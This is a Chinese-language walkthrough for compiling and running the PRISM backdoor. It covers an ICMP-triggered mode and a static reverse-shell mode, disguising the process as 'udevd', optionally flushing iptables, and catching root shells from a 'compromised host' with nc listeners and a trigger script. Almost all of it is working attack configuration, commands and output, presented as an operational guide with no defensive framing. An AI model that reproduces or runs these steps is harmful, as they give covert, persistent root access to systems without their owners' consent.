支持平台

Linux

Solaris

AIX

BSD/Mac

Android

 

功能

支持两种模式:ICMP和STATIC

进程名自定义

没有监听端口

支持清空iptables配置

pure C开发

没有依赖库

 

项目地址

git clone https://github.com/andreafabrizi/prism.git

 

编译

gcc <..OPTIONS..> -Wall -s -o prism prism.c

 

选项如下:

-DDETACH #后台运行

-DSTATIC #开启STATIC模式 (默认ICMP模式)

-DNORENAME #不使用自定义的进程名

-DIPTABLES #清空所有的iptables规则

 

ICMP模式

使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活。

 

可以修改密钥,默认是p4ssw0rd

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       icmp

 Key:                           p4ssw0rd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

可以看到模式为icmp

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

攻击机(172.16.100.182):

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

发送icmp包

内容如下:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

然后获得Shell。

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

STATIC模式

后门尝试连接硬编码的IP:PORT

 

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"

可以看到自定义进程名称为udevd

重新编译

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c


[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       static

 Host:                         172.16.100.182

 Port:                          6666

 Respawn Delay:              15 sec

 Process name:                 udevd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

查看进程

[root@vincent prism-master]# ps axu | grep udev | grep -v grep

root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd

获得Shell

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root